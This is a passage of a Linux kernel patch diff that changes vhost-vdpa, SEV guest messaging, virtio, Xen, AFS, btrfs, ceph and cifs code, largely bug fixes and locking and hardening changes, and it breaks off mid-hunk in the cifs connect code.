+diff --git a/drivers/vhost/vdpa.c b/drivers/vhost/vdpa.c
+index b7657984dd8df..6f532da59e08a 100644
+--- a/drivers/vhost/vdpa.c
++++ b/drivers/vhost/vdpa.c
+@@ -819,11 +819,7 @@ static void vhost_vdpa_unmap(struct vhost_vdpa *v,
+ 		if (!v->in_batch)
+ 			ops->set_map(vdpa, asid, iotlb);
+ 	}
+-	/* If we are in the middle of batch processing, delay the free
+-	 * of AS until BATCH_END.
+-	 */
+-	if (!v->in_batch && !iotlb->nmaps)
+-		vhost_vdpa_remove_as(v, asid);
++
+ }
+ 
+ static int vhost_vdpa_va_map(struct vhost_vdpa *v,
+@@ -1080,8 +1076,6 @@ static int vhost_vdpa_process_iotlb_msg(struct vhost_dev *dev, u32 asid,
+ 		if (v->in_batch && ops->set_map)
+ 			ops->set_map(vdpa, asid, iotlb);
+ 		v->in_batch = false;
+-		if (!iotlb->nmaps)
+-			vhost_vdpa_remove_as(v, asid);
+ 		break;
+ 	default:
+ 		r = -EINVAL;
+diff --git a/drivers/video/fbdev/mmp/hw/mmp_ctrl.c b/drivers/video/fbdev/mmp/hw/mmp_ctrl.c
+index a9df8ee798102..51fbf02a03430 100644
+--- a/drivers/video/fbdev/mmp/hw/mmp_ctrl.c
++++ b/drivers/video/fbdev/mmp/hw/mmp_ctrl.c
+@@ -514,9 +514,9 @@ static int mmphw_probe(struct platform_device *pdev)
+ 	/* get clock */
+ 	ctrl->clk = devm_clk_get(ctrl->dev, mi->clk_name);
+ 	if (IS_ERR(ctrl->clk)) {
++		ret = PTR_ERR(ctrl->clk);
+ 		dev_err_probe(ctrl->dev, ret,
+ 			      "unable to get clk %s\n", mi->clk_name);
+-		ret = -ENOENT;
+ 		goto failed;
+ 	}
+ 	clk_prepare_enable(ctrl->clk);
+diff --git a/drivers/virt/coco/sev-guest/sev-guest.c b/drivers/virt/coco/sev-guest/sev-guest.c
+index 46f1a8d558b0b..0c7b47acba2a8 100644
+--- a/drivers/virt/coco/sev-guest/sev-guest.c
++++ b/drivers/virt/coco/sev-guest/sev-guest.c
+@@ -46,7 +46,15 @@ struct snp_guest_dev {
+ 
+ 	void *certs_data;
+ 	struct snp_guest_crypto *crypto;
++	/* request and response are in unencrypted memory */
+ 	struct snp_guest_msg *request, *response;
++
++	/*
++	 * Avoid information leakage by double-buffering shared messages
++	 * in fields that are in regular encrypted memory.
++	 */
++	struct snp_guest_msg secret_request, secret_response;
++
+ 	struct snp_secrets_page_layout *layout;
+ 	struct snp_req_data input;
+ 	u32 *os_area_msg_seqno;
+@@ -266,14 +274,17 @@ static int dec_payload(struct snp_guest_dev *snp_dev, struct snp_guest_msg *msg,
+ static int verify_and_dec_payload(struct snp_guest_dev *snp_dev, void *payload, u32 sz)
+ {
+ 	struct snp_guest_crypto *crypto = snp_dev->crypto;
+-	struct snp_guest_msg *resp = snp_dev->response;
+-	struct snp_guest_msg *req = snp_dev->request;
++	struct snp_guest_msg *resp = &snp_dev->secret_response;
++	struct snp_guest_msg *req = &snp_dev->secret_request;
+ 	struct snp_guest_msg_hdr *req_hdr = &req->hdr;
+ 	struct snp_guest_msg_hdr *resp_hdr = &resp->hdr;
+ 
+ 	dev_dbg(snp_dev->dev, "response [seqno %lld type %d version %d sz %d]\n",
+ 		resp_hdr->msg_seqno, resp_hdr->msg_type, resp_hdr->msg_version, resp_hdr->msg_sz);
+ 
++	/* Copy response from shared memory to encrypted memory. */
++	memcpy(resp, snp_dev->response, sizeof(*resp));
++
+ 	/* Verify that the sequence counter is incremented by 1 */
+ 	if (unlikely(resp_hdr->msg_seqno != (req_hdr->msg_seqno + 1)))
+ 		return -EBADMSG;
+@@ -297,7 +308,7 @@ static int verify_and_dec_payload(struct snp_guest_dev *snp_dev, void *payload,
+ static int enc_payload(struct snp_guest_dev *snp_dev, u64 seqno, int version, u8 type,
+ 			void *payload, size_t sz)
+ {
+-	struct snp_guest_msg *req = snp_dev->request;
++	struct snp_guest_msg *req = &snp_dev->secret_request;
+ 	struct snp_guest_msg_hdr *hdr = &req->hdr;
+ 
+ 	memset(req, 0, sizeof(*req));
+@@ -417,13 +428,21 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 	if (!seqno)
+ 		return -EIO;
+ 
++	/* Clear shared memory's response for the host to populate. */
+ 	memset(snp_dev->response, 0, sizeof(struct snp_guest_msg));
+ 
+-	/* Encrypt the userspace provided payload */
++	/* Encrypt the userspace provided payload in snp_dev->secret_request. */
+ 	rc = enc_payload(snp_dev, seqno, msg_ver, type, req_buf, req_sz);
+ 	if (rc)
+ 		return rc;
+ 
++	/*
++	 * Write the fully encrypted request to the shared unencrypted
++	 * request page.
++	 */
++	memcpy(snp_dev->request, &snp_dev->secret_request,
++	       sizeof(snp_dev->secret_request));
++
+ 	rc = __handle_guest_request(snp_dev, exit_code, fw_err);
+ 	if (rc) {
+ 		if (rc == -EIO && *fw_err == SNP_GUEST_REQ_INVALID_LEN)
+diff --git a/drivers/virtio/virtio_ring.c b/drivers/virtio/virtio_ring.c
+index 723c4e29e1d3b..5bee2ab62111b 100644
+--- a/drivers/virtio/virtio_ring.c
++++ b/drivers/virtio/virtio_ring.c
+@@ -848,6 +848,14 @@ static void virtqueue_disable_cb_split(struct virtqueue *_vq)
+ 
+ 	if (!(vq->split.avail_flags_shadow & VRING_AVAIL_F_NO_INTERRUPT)) {
+ 		vq->split.avail_flags_shadow |= VRING_AVAIL_F_NO_INTERRUPT;
++
++		/*
++		 * If device triggered an event already it won't trigger one again:
++		 * no need to disable.
++		 */
++		if (vq->event_triggered)
++			return;
++
+ 		if (vq->event)
+ 			/* TODO: this is a hack. Figure out a cleaner value to write. */
+ 			vring_used_event(&vq->split.vring) = 0x0;
+@@ -1687,6 +1695,14 @@ static void virtqueue_disable_cb_packed(struct virtqueue *_vq)
+ 
+ 	if (vq->packed.event_flags_shadow != VRING_PACKED_EVENT_FLAG_DISABLE) {
+ 		vq->packed.event_flags_shadow = VRING_PACKED_EVENT_FLAG_DISABLE;
++
++		/*
++		 * If device triggered an event already it won't trigger one again:
++		 * no need to disable.
++		 */
++		if (vq->event_triggered)
++			return;
++
+ 		vq->packed.vring.driver->flags =
+ 			cpu_to_le16(vq->packed.event_flags_shadow);
+ 	}
+@@ -2309,12 +2325,6 @@ void virtqueue_disable_cb(struct virtqueue *_vq)
+ {
+ 	struct vring_virtqueue *vq = to_vvq(_vq);
+ 
+-	/* If device triggered an event already it won't trigger one again:
+-	 * no need to disable.
+-	 */
+-	if (vq->event_triggered)
+-		return;
+-
+ 	if (vq->packed_ring)
+ 		virtqueue_disable_cb_packed(_vq);
+ 	else
+diff --git a/drivers/xen/pcpu.c b/drivers/xen/pcpu.c
+index fd3a644b08559..b3e3d1bb37f3e 100644
+--- a/drivers/xen/pcpu.c
++++ b/drivers/xen/pcpu.c
+@@ -58,6 +58,7 @@ struct pcpu {
+ 	struct list_head list;
+ 	struct device dev;
+ 	uint32_t cpu_id;
++	uint32_t acpi_id;
+ 	uint32_t flags;
+ };
+ 
+@@ -249,6 +250,7 @@ static struct pcpu *create_and_register_pcpu(struct xenpf_pcpuinfo *info)
+ 
+ 	INIT_LIST_HEAD(&pcpu->list);
+ 	pcpu->cpu_id = info->xen_cpuid;
++	pcpu->acpi_id = info->acpi_id;
+ 	pcpu->flags = info->flags;
+ 
+ 	/* Need hold on xen_pcpu_lock before pcpu list manipulations */
+@@ -381,3 +383,21 @@ err1:
+ 	return ret;
+ }
+ arch_initcall(xen_pcpu_init);
++
++#ifdef CONFIG_ACPI
++bool __init xen_processor_present(uint32_t acpi_id)
++{
++	const struct pcpu *pcpu;
++	bool online = false;
++
++	mutex_lock(&xen_pcpu_lock);
++	list_for_each_entry(pcpu, &xen_pcpus, list)
++		if (pcpu->acpi_id == acpi_id) {
++			online = pcpu->flags & XEN_PCPU_FLAGS_ONLINE;
++			break;
++		}
++	mutex_unlock(&xen_pcpu_lock);
++
++	return online;
++}
++#endif
+diff --git a/fs/Makefile b/fs/Makefile
+index 4dea17840761a..80ab0154419ec 100644
+--- a/fs/Makefile
++++ b/fs/Makefile
+@@ -6,7 +6,6 @@
+ # Rewritten to use lists instead of if-statements.
+ # 
+ 
+-obj-$(CONFIG_SYSCTL)		+= sysctls.o
+ 
+ obj-y :=	open.o read_write.o file_table.o super.o \
+ 		char_dev.o stat.o exec.o pipe.o namei.o fcntl.o \
+@@ -49,7 +48,7 @@ obj-$(CONFIG_FS_MBCACHE)	+= mbcache.o
+ obj-$(CONFIG_FS_POSIX_ACL)	+= posix_acl.o
+ obj-$(CONFIG_NFS_COMMON)	+= nfs_common/
+ obj-$(CONFIG_COREDUMP)		+= coredump.o
+-obj-$(CONFIG_SYSCTL)		+= drop_caches.o
++obj-$(CONFIG_SYSCTL)		+= drop_caches.o sysctls.o
+ 
+ obj-$(CONFIG_FHANDLE)		+= fhandle.o
+ obj-y				+= iomap/
+diff --git a/fs/afs/dir.c b/fs/afs/dir.c
+index b7c1f8c84b38a..be8f8da5b6b02 100644
+--- a/fs/afs/dir.c
++++ b/fs/afs/dir.c
+@@ -275,6 +275,7 @@ static struct afs_read *afs_read_dir(struct afs_vnode *dvnode, struct key *key)
+ 	loff_t i_size;
+ 	int nr_pages, i;
+ 	int ret;
++	loff_t remote_size = 0;
+ 
+ 	_enter("");
+ 
+@@ -289,6 +290,8 @@ static struct afs_read *afs_read_dir(struct afs_vnode *dvnode, struct key *key)
+ 
+ expand:
+ 	i_size = i_size_read(&dvnode->netfs.inode);
++	if (i_size < remote_size)
++	    i_size = remote_size;
+ 	if (i_size < 2048) {
+ 		ret = afs_bad(dvnode, afs_file_error_dir_small);
+ 		goto error;
+@@ -364,6 +367,7 @@ expand:
+ 			 * buffer.
+ 			 */
+ 			up_write(&dvnode->validate_lock);
++			remote_size = req->file_size;
+ 			goto expand;
+ 		}
+ 
+diff --git a/fs/afs/inode.c b/fs/afs/inode.c
+index 6d3a3dbe49286..5921dd3687e39 100644
+--- a/fs/afs/inode.c
++++ b/fs/afs/inode.c
+@@ -230,6 +230,7 @@ static void afs_apply_status(struct afs_operation *op,
+ 			set_bit(AFS_VNODE_ZAP_DATA, &vnode->flags);
+ 		}
+ 		change_size = true;
++		data_changed = true;
+ 	} else if (vnode->status.type == AFS_FTYPE_DIR) {
+ 		/* Expected directory change is handled elsewhere so
+ 		 * that we can locally edit the directory and save on a
+@@ -449,7 +450,7 @@ static void afs_get_inode_cache(struct afs_vnode *vnode)
+ 				    0 : FSCACHE_ADV_SINGLE_CHUNK,
+ 				    &key, sizeof(key),
+ 				    &aux, sizeof(aux),
+-				    vnode->status.size));
++				    i_size_read(&vnode->netfs.inode)));
+ #endif
+ }
+ 
+@@ -765,6 +766,13 @@ int afs_getattr(struct user_namespace *mnt_userns, const struct path *path,
+ 		if (test_bit(AFS_VNODE_SILLY_DELETED, &vnode->flags) &&
+ 		    stat->nlink > 0)
+ 			stat->nlink -= 1;
++
++		/* Lie about the size of directories.  We maintain a locally
++		 * edited copy and may make different allocation decisions on
++		 * it, but we need to give userspace the server's size.
++		 */
++		if (S_ISDIR(inode->i_mode))
++			stat->size = vnode->netfs.remote_i_size;
+ 	} while (need_seqretry(&vnode->cb_lock, seq));
+ 
+ 	done_seqretry(&vnode->cb_lock, seq);
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index c232636ecdfea..bff2d1fd3c812 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -3160,6 +3160,11 @@ static long btrfs_ioctl_scrub(struct file *file, void __user *arg)
+ 	if (IS_ERR(sa))
+ 		return PTR_ERR(sa);
+ 
++	if (sa->flags & ~BTRFS_SCRUB_SUPPORTED_FLAGS) {
++		ret = -EOPNOTSUPP;
++		goto out;
++	}
++
+ 	if (!(sa->flags & BTRFS_SCRUB_READONLY)) {
+ 		ret = mnt_want_write_file(file);
+ 		if (ret)
+diff --git a/fs/ceph/caps.c b/fs/ceph/caps.c
+index 210e400378818..e1c7f0aa0ba66 100644
+--- a/fs/ceph/caps.c
++++ b/fs/ceph/caps.c
+@@ -430,7 +430,7 @@ void ceph_reservation_status(struct ceph_fs_client *fsc,
+  *
+  * Called with i_ceph_lock held.
+  */
+-static struct ceph_cap *__get_cap_for_mds(struct ceph_inode_info *ci, int mds)
++struct ceph_cap *__get_cap_for_mds(struct ceph_inode_info *ci, int mds)
+ {
+ 	struct ceph_cap *cap;
+ 	struct rb_node *n = ci->i_caps.rb_node;
+diff --git a/fs/ceph/debugfs.c b/fs/ceph/debugfs.c
+index bec3c4549c07d..3904333fa6c38 100644
+--- a/fs/ceph/debugfs.c
++++ b/fs/ceph/debugfs.c
+@@ -248,14 +248,20 @@ static int metrics_caps_show(struct seq_file *s, void *p)
+ 	return 0;
+ }
+ 
+-static int caps_show_cb(struct inode *inode, struct ceph_cap *cap, void *p)
++static int caps_show_cb(struct inode *inode, int mds, void *p)
+ {
++	struct ceph_inode_info *ci = ceph_inode(inode);
+ 	struct seq_file *s = p;
+-
+-	seq_printf(s, "0x%-17llx%-3d%-17s%-17s\n", ceph_ino(inode),
+-		   cap->session->s_mds,
+-		   ceph_cap_string(cap->issued),
+-		   ceph_cap_string(cap->implemented));
++	struct ceph_cap *cap;
++
++	spin_lock(&ci->i_ceph_lock);
++	cap = __get_cap_for_mds(ci, mds);
++	if (cap)
++		seq_printf(s, "0x%-17llx%-3d%-17s%-17s\n", ceph_ino(inode),
++			   cap->session->s_mds,
++			   ceph_cap_string(cap->issued),
++			   ceph_cap_string(cap->implemented));
++	spin_unlock(&ci->i_ceph_lock);
+ 	return 0;
+ }
+ 
+diff --git a/fs/ceph/mds_client.c b/fs/ceph/mds_client.c
+index 27a245d959c0a..54e3c2ab21d22 100644
+--- a/fs/ceph/mds_client.c
++++ b/fs/ceph/mds_client.c
+@@ -1632,8 +1632,8 @@ static void cleanup_session_requests(struct ceph_mds_client *mdsc,
+  * Caller must hold session s_mutex.
+  */
+ int ceph_iterate_session_caps(struct ceph_mds_session *session,
+-			      int (*cb)(struct inode *, struct ceph_cap *,
+-					void *), void *arg)
++			      int (*cb)(struct inode *, int mds, void *),
++			      void *arg)
+ {
+ 	struct list_head *p;
+ 	struct ceph_cap *cap;
+@@ -1645,6 +1645,8 @@ int ceph_iterate_session_caps(struct ceph_mds_session *session,
+ 	spin_lock(&session->s_cap_lock);
+ 	p = session->s_caps.next;
+ 	while (p != &session->s_caps) {
++		int mds;
++
+ 		cap = list_entry(p, struct ceph_cap, session_caps);
+ 		inode = igrab(&cap->ci->netfs.inode);
+ 		if (!inode) {
+@@ -1652,6 +1654,7 @@ int ceph_iterate_session_caps(struct ceph_mds_session *session,
+ 			continue;
+ 		}
+ 		session->s_cap_iterator = cap;
++		mds = cap->mds;
+ 		spin_unlock(&session->s_cap_lock);
+ 
+ 		if (last_inode) {
+@@ -1663,7 +1666,7 @@ int ceph_iterate_session_caps(struct ceph_mds_session *session,
+ 			old_cap = NULL;
+ 		}
+ 
+-		ret = cb(inode, cap, arg);
++		ret = cb(inode, mds, arg);
+ 		last_inode = inode;
+ 
+ 		spin_lock(&session->s_cap_lock);
+@@ -1696,20 +1699,25 @@ out:
+ 	return ret;
+ }
+ 
+-static int remove_session_caps_cb(struct inode *inode, struct ceph_cap *cap,
+-				  void *arg)
++static int remove_session_caps_cb(struct inode *inode, int mds, void *arg)
+ {
+ 	struct ceph_inode_info *ci = ceph_inode(inode);
+ 	bool invalidate = false;
+-	int iputs;
++	struct ceph_cap *cap;
++	int iputs = 0;
+ 
+-	dout("removing cap %p, ci is %p, inode is %p\n",
+-	     cap, ci, &ci->netfs.inode);
+ 	spin_lock(&ci->i_ceph_lock);
+-	iputs = ceph_purge_inode_cap(inode, cap, &invalidate);
++	cap = __get_cap_for_mds(ci, mds);
++	if (cap) {
++		dout(" removing cap %p, ci is %p, inode is %p\n",
++		     cap, ci, &ci->netfs.inode);
++
++		iputs = ceph_purge_inode_cap(inode, cap, &invalidate);
++	}
+ 	spin_unlock(&ci->i_ceph_lock);
+ 
+-	wake_up_all(&ci->i_cap_wq);
++	if (cap)
++		wake_up_all(&ci->i_cap_wq);
+ 	if (invalidate)
+ 		ceph_queue_invalidate(inode);
+ 	while (iputs--)
+@@ -1780,8 +1788,7 @@ enum {
+  *
+  * caller must hold s_mutex.
+  */
+-static int wake_up_session_cb(struct inode *inode, struct ceph_cap *cap,
+-			      void *arg)
++static int wake_up_session_cb(struct inode *inode, int mds, void *arg)
+ {
+ 	struct ceph_inode_info *ci = ceph_inode(inode);
+ 	unsigned long ev = (unsigned long)arg;
+@@ -1792,12 +1799,14 @@ static int wake_up_session_cb(struct inode *inode, struct ceph_cap *cap,
+ 		ci->i_requested_max_size = 0;
+ 		spin_unlock(&ci->i_ceph_lock);
+ 	} else if (ev == RENEWCAPS) {
+-		if (cap->cap_gen < atomic_read(&cap->session->s_cap_gen)) {
+-			/* mds did not re-issue stale cap */
+-			spin_lock(&ci->i_ceph_lock);
++		struct ceph_cap *cap;
++
++		spin_lock(&ci->i_ceph_lock);
++		cap = __get_cap_for_mds(ci, mds);
++		/* mds did not re-issue stale cap */
++		if (cap && cap->cap_gen < atomic_read(&cap->session->s_cap_gen))
+ 			cap->issued = cap->implemented = CEPH_CAP_PIN;
+-			spin_unlock(&ci->i_ceph_lock);
+-		}
++		spin_unlock(&ci->i_ceph_lock);
+ 	} else if (ev == FORCE_RO) {
+ 	}
+ 	wake_up_all(&ci->i_cap_wq);
+@@ -1959,16 +1968,22 @@ out:
+  * Yes, this is a bit sloppy.  Our only real goal here is to respond to
+  * memory pressure from the MDS, though, so it needn't be perfect.
+  */
+-static int trim_caps_cb(struct inode *inode, struct ceph_cap *cap, void *arg)
++static int trim_caps_cb(struct inode *inode, int mds, void *arg)
+ {
+ 	int *remaining = arg;
+ 	struct ceph_inode_info *ci = ceph_inode(inode);
+ 	int used, wanted, oissued, mine;
++	struct ceph_cap *cap;
+ 
+ 	if (*remaining <= 0)
+ 		return -1;
+ 
+ 	spin_lock(&ci->i_ceph_lock);
++	cap = __get_cap_for_mds(ci, mds);
++	if (!cap) {
++		spin_unlock(&ci->i_ceph_lock);
++		return 0;
++	}
+ 	mine = cap->issued | cap->implemented;
+ 	used = __ceph_caps_used(ci);
+ 	wanted = __ceph_caps_file_wanted(ci);
+@@ -3911,26 +3926,22 @@ out_unlock:
+ /*
+  * Encode information about a cap for a reconnect with the MDS.
+  */
+-static int reconnect_caps_cb(struct inode *inode, struct ceph_cap *cap,
+-			  void *arg)
++static int reconnect_caps_cb(struct inode *inode, int mds, void *arg)
+ {
+ 	union {
+ 		struct ceph_mds_cap_reconnect v2;
+ 		struct ceph_mds_cap_reconnect_v1 v1;
+ 	} rec;
+-	struct ceph_inode_info *ci = cap->ci;
++	struct ceph_inode_info *ci = ceph_inode(inode);
+ 	struct ceph_reconnect_state *recon_state = arg;
+ 	struct ceph_pagelist *pagelist = recon_state->pagelist;
+ 	struct dentry *dentry;
++	struct ceph_cap *cap;
+ 	char *path;
+-	int pathlen = 0, err;
++	int pathlen = 0, err = 0;
+ 	u64 pathbase;
+ 	u64 snap_follows;
+ 
+-	dout(" adding %p ino %llx.%llx cap %p %lld %s\n",
+-	     inode, ceph_vinop(inode), cap, cap->cap_id,
+-	     ceph_cap_string(cap->issued));
+-
+ 	dentry = d_find_primary(inode);
+ 	if (dentry) {
+ 		/* set pathbase to parent dir when msg_version >= 2 */
+@@ -3947,6 +3958,15 @@ static int reconnect_caps_cb(struct inode *inode, struct ceph_cap *cap,
+ 	}
+ 
+ 	spin_lock(&ci->i_ceph_lock);
++	cap = __get_cap_for_mds(ci, mds);
++	if (!cap) {
++		spin_unlock(&ci->i_ceph_lock);
++		goto out_err;
++	}
++	dout(" adding %p ino %llx.%llx cap %p %lld %s\n",
++	     inode, ceph_vinop(inode), cap, cap->cap_id,
++	     ceph_cap_string(cap->issued));
++
+ 	cap->seq = 0;        /* reset cap seq */
+ 	cap->issue_seq = 0;  /* and issue_seq */
+ 	cap->mseq = 0;       /* and migrate_seq */
+diff --git a/fs/ceph/mds_client.h b/fs/ceph/mds_client.h
+index 0598faa50e2e0..18b026b1ac63f 100644
+--- a/fs/ceph/mds_client.h
++++ b/fs/ceph/mds_client.h
+@@ -541,8 +541,7 @@ extern void ceph_flush_cap_releases(struct ceph_mds_client *mdsc,
+ extern void ceph_queue_cap_reclaim_work(struct ceph_mds_client *mdsc);
+ extern void ceph_reclaim_caps_nr(struct ceph_mds_client *mdsc, int nr);
+ extern int ceph_iterate_session_caps(struct ceph_mds_session *session,
+-				     int (*cb)(struct inode *,
+-					       struct ceph_cap *, void *),
++				     int (*cb)(struct inode *, int mds, void *),
+ 				     void *arg);
+ extern void ceph_mdsc_pre_umount(struct ceph_mds_client *mdsc);
+ 
+diff --git a/fs/ceph/super.h b/fs/ceph/super.h
+index 07c6906cda70d..b89d2cea4c1d1 100644
+--- a/fs/ceph/super.h
++++ b/fs/ceph/super.h
+@@ -1192,6 +1192,8 @@ extern void ceph_kick_flushing_caps(struct ceph_mds_client *mdsc,
+ 				    struct ceph_mds_session *session);
+ void ceph_kick_flushing_inode_caps(struct ceph_mds_session *session,
+ 				   struct ceph_inode_info *ci);
++extern struct ceph_cap *__get_cap_for_mds(struct ceph_inode_info *ci,
++					  int mds);
+ extern struct ceph_cap *ceph_get_cap_for_mds(struct ceph_inode_info *ci,
+ 					     int mds);
+ extern void ceph_take_cap_refs(struct ceph_inode_info *ci, int caps,
+diff --git a/fs/cifs/cifs_debug.c b/fs/cifs/cifs_debug.c
+index 72e24256b5ec2..cbf7e6ab638f5 100644
+--- a/fs/cifs/cifs_debug.c
++++ b/fs/cifs/cifs_debug.c
+@@ -279,8 +279,10 @@ static int cifs_debug_data_proc_show(struct seq_file *m, void *v)
+ 		seq_printf(m, "\n%d) ConnectionId: 0x%llx ",
+ 			c, server->conn_id);
+ 
++		spin_lock(&server->srv_lock);
+ 		if (server->hostname)
+ 			seq_printf(m, "Hostname: %s ", server->hostname);
++		spin_unlock(&server->srv_lock);
+ #ifdef CONFIG_CIFS_SMB_DIRECT
+ 		if (!server->rdma)
+ 			goto skip_rdma;
+@@ -620,10 +622,13 @@ static int cifs_stats_proc_show(struct seq_file *m, void *v)
+ 				server->fastest_cmd[j],
+ 				server->slowest_cmd[j]);
+ 		for (j = 0; j < NUMBER_OF_SMB2_COMMANDS; j++)
+-			if (atomic_read(&server->smb2slowcmd[j]))
++			if (atomic_read(&server->smb2slowcmd[j])) {
++				spin_lock(&server->srv_lock);
+ 				seq_printf(m, "  %d slow responses from %s for command %d\n",
+ 					atomic_read(&server->smb2slowcmd[j]),
+ 					server->hostname, j);
++				spin_unlock(&server->srv_lock);
++			}
+ #endif /* STATS2 */
+ 		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
+ 			list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+diff --git a/fs/cifs/cifs_debug.h b/fs/cifs/cifs_debug.h
+index d44808263cfba..ce5cfd236fdb8 100644
+--- a/fs/cifs/cifs_debug.h
++++ b/fs/cifs/cifs_debug.h
+@@ -81,19 +81,19 @@ do {									\
+ 
+ #define cifs_server_dbg_func(ratefunc, type, fmt, ...)			\
+ do {									\
+-	const char *sn = "";						\
+-	if (server && server->hostname)					\
+-		sn = server->hostname;					\
++	spin_lock(&server->srv_lock);					\
+ 	if ((type) & FYI && cifsFYI & CIFS_INFO) {			\
+ 		pr_debug_ ## ratefunc("%s: \\\\%s " fmt,		\
+-				      __FILE__, sn, ##__VA_ARGS__);	\
++				      __FILE__, server->hostname,	\
++				      ##__VA_ARGS__);			\
+ 	} else if ((type) & VFS) {					\
+ 		pr_err_ ## ratefunc("VFS: \\\\%s " fmt,			\
+-				    sn, ##__VA_ARGS__);			\
++				    server->hostname, ##__VA_ARGS__);	\
+ 	} else if ((type) & NOISY && (NOISY != 0)) {			\
+ 		pr_debug_ ## ratefunc("\\\\%s " fmt,			\
+-				      sn, ##__VA_ARGS__);		\
++				      server->hostname, ##__VA_ARGS__);	\
+ 	}								\
++	spin_unlock(&server->srv_lock);					\
+ } while (0)
+ 
+ #define cifs_server_dbg(type, fmt, ...)					\
+diff --git a/fs/cifs/cifsglob.h b/fs/cifs/cifsglob.h
+index 5aaaa47dea410..ea216e9d0f944 100644
+--- a/fs/cifs/cifsglob.h
++++ b/fs/cifs/cifsglob.h
+@@ -742,17 +742,23 @@ struct TCP_Server_Info {
+ #endif
+ 	struct mutex refpath_lock; /* protects leaf_fullpath */
+ 	/*
+-	 * Canonical DFS full paths that were used to chase referrals in mount and reconnect.
++	 * origin_fullpath: Canonical copy of smb3_fs_context::source.
++	 *                  It is used for matching existing DFS tcons.
+ 	 *
+-	 * origin_fullpath: first or original referral path
+-	 * leaf_fullpath: last referral path (might be changed due to nested links in reconnect)
++	 * leaf_fullpath: Canonical DFS referral path related to this
++	 *                connection.
++	 *                It is used in DFS cache refresher, reconnect and may
++	 *                change due to nested DFS links.
+ 	 *
+-	 * current_fullpath: pointer to either origin_fullpath or leaf_fullpath
+-	 * NOTE: cannot be accessed outside cifs_reconnect() and smb2_reconnect()
++	 * Both protected by @refpath_lock and @srv_lock.  The @refpath_lock is
++	 * mosly used for not requiring a copy of @leaf_fullpath when getting
++	 * cached or new DFS referrals (which might also sleep during I/O).
++	 * While @srv_lock is held for making string and NULL comparions against
++	 * both fields as in mount(2) and cache refresh.
+ 	 *
+-	 * format: \\HOST\SHARE\[OPTIONAL PATH]
++	 * format: \\HOST\SHARE[\OPTIONAL PATH]
+ 	 */
+-	char *origin_fullpath, *leaf_fullpath, *current_fullpath;
++	char *origin_fullpath, *leaf_fullpath;
+ };
+ 
+ static inline bool is_smb1(struct TCP_Server_Info *server)
+@@ -1768,7 +1774,6 @@ struct cifs_mount_ctx {
+ 	struct TCP_Server_Info *server;
+ 	struct cifs_ses *ses;
+ 	struct cifs_tcon *tcon;
+-	char *origin_fullpath, *leaf_fullpath;
+ 	struct list_head dfs_ses_list;
+ };
+ 
+diff --git a/fs/cifs/cifsproto.h b/fs/cifs/cifsproto.h
+index 639df85dafd6c..1765368f373cf 100644
+--- a/fs/cifs/cifsproto.h
++++ b/fs/cifs/cifsproto.h
+@@ -8,6 +8,7 @@
+ #ifndef _CIFSPROTO_H
+ #define _CIFSPROTO_H
+ #include <linux/nls.h>
++#include <linux/ctype.h>
+ #include "trace.h"
+ #ifdef CONFIG_CIFS_DFS_UPCALL
+ #include "dfs_cache.h"
+@@ -569,7 +570,7 @@ extern int E_md4hash(const unsigned char *passwd, unsigned char *p16,
+ extern struct TCP_Server_Info *
+ cifs_find_tcp_session(struct smb3_fs_context *ctx);
+ 
+-extern void cifs_put_smb_ses(struct cifs_ses *ses);
++void __cifs_put_smb_ses(struct cifs_ses *ses);
+ 
+ extern struct cifs_ses *
+ cifs_get_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx);
+@@ -699,4 +700,45 @@ struct super_block *cifs_get_tcon_super(struct cifs_tcon *tcon);
+ void cifs_put_tcon_super(struct super_block *sb);
+ int cifs_wait_for_server_reconnect(struct TCP_Server_Info *server, bool retry);
+ 
++/* Put references of @ses and @ses->dfs_root_ses */
++static inline void cifs_put_smb_ses(struct cifs_ses *ses)
++{
++	struct cifs_ses *rses = ses->dfs_root_ses;
++
++	__cifs_put_smb_ses(ses);
++	if (rses)
++		__cifs_put_smb_ses(rses);
++}
++
++/* Get an active reference of @ses and @ses->dfs_root_ses.
++ *
++ * NOTE: make sure to call this function when incrementing reference count of
++ * @ses to ensure that any DFS root session attached to it (@ses->dfs_root_ses)
++ * will also get its reference count incremented.
++ *
++ * cifs_put_smb_ses() will put both references, so call it when you're done.
++ */
++static inline void cifs_smb_ses_inc_refcount(struct cifs_ses *ses)
++{
++	lockdep_assert_held(&cifs_tcp_ses_lock);
++
++	ses->ses_count++;
++	if (ses->dfs_root_ses)
++		ses->dfs_root_ses->ses_count++;
++}
++
++static inline bool dfs_src_pathname_equal(const char *s1, const char *s2)
++{
++	if (strlen(s1) != strlen(s2))
++		return false;
++	for (; *s1; s1++, s2++) {
++		if (*s1 == '/' || *s1 == '\\') {
++			if (*s2 != '/' && *s2 != '\\')
++				return false;
++		} else if (tolower(*s1) != tolower(*s2))
++			return false;
++	}
++	return true;
++}
++
+ #endif			/* _CIFSPROTO_H */
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index 985e962cf0858..87527512c2660 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
+@@ -435,8 +435,10 @@ static int __reconnect_target_unlocked(struct TCP_Server_Info *server, const cha
+ 		if (server->hostname != target) {
+ 			hostname = extract_hostname(target);
+ 			if (!IS_ERR(hostname)) {
++				spin_lock(&server->srv_lock);
+ 				kfree(server->hostname);
+ 				server->hostname = hostname;
++				spin_unlock(&server->srv_lock);
+ 			} else {
+ 				cifs_dbg(FYI, "%s: couldn't extract hostname or address from dfs target: %ld\n",
+ 					 __func__, PTR_ERR(hostname));
+@@ -484,7 +486,6 @@ static int reconnect_target_unlocked(struct TCP_Server_Info *server, struct dfs_
+ static int reconnect_dfs_server(struct TCP_Server_Info *server)
+ {
+ 	int rc = 0;
+-	const char *refpath = server->current_fullpath + 1;
+ 	struct dfs_cache_tgt_list tl = DFS_CACHE_TGT_LIST_INIT(tl);
+ 	struct dfs_cache_tgt_iterator *target_hint = NULL;
+ 	int num_targets = 0;
+@@ -497,8 +498,10 @@ static int reconnect_dfs_server(struct TCP_Server_Info *server)
+ 	 * through /proc/fs/cifs/dfscache or the target list is empty due to server settings after
+ 	 * refreshing the referral, so, in this case, default it to 1.
